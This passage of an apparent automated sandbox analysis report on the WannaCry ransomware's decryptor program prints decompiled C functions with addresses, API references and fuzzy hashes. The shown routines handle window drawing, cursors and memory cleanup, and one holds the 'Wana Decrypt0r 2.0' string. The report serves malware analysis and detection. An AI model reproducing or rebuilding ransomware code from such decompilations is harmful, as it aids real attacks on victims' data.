					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                                      0x00405181
                                                      0x00405186
                                                      0x0040518a
                                                      0x00405191
                                                      0x0040519c
                                                      0x004051fb
                                                      0x0040519e
                                                      0x0040519e
                                                      0x004051a1
                                                      0x004051a9
                                                      0x004051af
                                                      0x004051b5
                                                      0x004051b5
                                                      0x004051bf
                                                      0x004051c5
                                                      0x004051c5
                                                      0x004051cf
                                                      0x00000000
                                                      0x004051f2
                                                      0x004051e7
                                                      0x004051e7

                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E00412A00(intOrPtr* _a4) {
				intOrPtr _t8;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14);
						L00412C98();
						_t8 =  *0x4220dc; // 0x0
						return _t8;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}









                                                      0x00412a01
                                                      0x00412a07
                                                      0x00412a18
                                                      0x00412a27
                                                      0x00412a27
                                                      0x00412a33
                                                      0x00412a38
                                                      0x00412a3a
                                                      0x00412a42
                                                      0x00412a44
                                                      0x00412a45
                                                      0x00412a4a
                                                      0x00412a4a
                                                      0x00412a4d
                                                      0x00412a53
                                                      0x00412a5f
                                                      0x00412a61
                                                      0x00412a62
                                                      0x00412a67
                                                      0x00412a67
                                                      0x00412a6a
                                                      0x00412a6b
                                                      0x00412a75
                                                      0x00412a7a
                                                      0x00412a7a
                                                      0x00412a7d
                                                      0x00412a7e
                                                      0x00412a83
                                                      0x00412a8d
                                                      0x00412a1a
                                                      0x00412a20
                                                      0x00412a25
                                                      0x00412a25
                                                      0x00412a09
                                                      0x00412a0f
                                                      0x00412a14
                                                      0x00412a14

                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                                      0x00404434
                                                      0x00404436
                                                      0x0040443b
                                                      0x00404480
                                                      0x00404484
                                                      0x00404484
                                                      0x00404497
                                                      0x0040449e
                                                      0x00404499
                                                      0x00404499
                                                      0x00404499
                                                      0x004044a2
                                                      0x004044aa
                                                      0x004044b3
                                                      0x0040443d
                                                      0x0040443f
                                                      0x00404447
                                                      0x0040444f
                                                      0x00404452
                                                      0x00404449
                                                      0x00404449
                                                      0x00404449
                                                      0x0040445a
                                                      0x00404463
                                                      0x0040446b
                                                      0x0040446f
                                                      0x00404478
                                                      0x00404478

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                                      0x00404cf0
                                                      0x00404cf2
                                                      0x00404cf7
                                                      0x00404cfd
                                                      0x00404cfe
                                                      0x00404d0c
                                                      0x00404d10
                                                      0x00404d18
                                                      0x00404d1b
                                                      0x00404d1f
                                                      0x00404d27
                                                      0x00404d2c
                                                      0x00404d31
                                                      0x00404d37
                                                      0x00404d3a
                                                      0x00404d3e
                                                      0x00404d46
                                                      0x00404d4b
                                                      0x00404d53
                                                      0x00404d59
                                                      0x00404d5e
                                                      0x00404d65
                                                      0x00404d6d
                                                      0x00404d78
                                                      0x00404d82

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                                      0x00404170
                                                      0x00404172
                                                      0x00404177
                                                      0x0040417d
                                                      0x0040417e
                                                      0x0040418c
                                                      0x00404190
                                                      0x00404196
                                                      0x0040419e
                                                      0x004041a1
                                                      0x004041a5
                                                      0x004041ad
                                                      0x004041b2
                                                      0x004041ba
                                                      0x004041c0
                                                      0x004041c5
                                                      0x004041cd
                                                      0x004041d2
                                                      0x004041d9
                                                      0x004041e1
                                                      0x004041ec
                                                      0x004041f6

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                                      0x00402e00
                                                      0x00402e06
                                                      0x00402e0e
                                                      0x00402e7a
                                                      0x00402e7a
                                                      0x00402e7e
                                                      0x00402e82
                                                      0x00402e10
                                                      0x00402e14
                                                      0x00402e14
                                                      0x00402e16
                                                      0x00402e1d
                                                      0x00402e24
                                                      0x00402e27
                                                      0x00402e2c
                                                      0x00402e2e
                                                      0x00402e33
                                                      0x00402e43
                                                      0x00402e44
                                                      0x00402e49
                                                      0x00402e39
                                                      0x00402e3b
                                                      0x00402e3b
                                                      0x00402e33
                                                      0x00402e4c
                                                      0x00402e4d
                                                      0x00402e50
                                                      0x00402e53
                                                      0x00402e56
                                                      0x00402e62
                                                      0x00402e68
                                                      0x00402e68
                                                      0x00402e6d
                                                      0x00402e73
                                                      0x00402e77
                                                      0x00402e77

                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                                      0x00407650
                                                      0x0040765c
                                                      0x00407675
                                                      0x00407677
                                                      0x0040767f
                                                      0x00407688
                                                      0x0040768d
                                                      0x0040767f
                                                      0x00407692
                                                      0x00407698
                                                      0x0040765e
                                                      0x00407660
                                                      0x00407667
                                                      0x0040766d
                                                      0x0040766d

                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%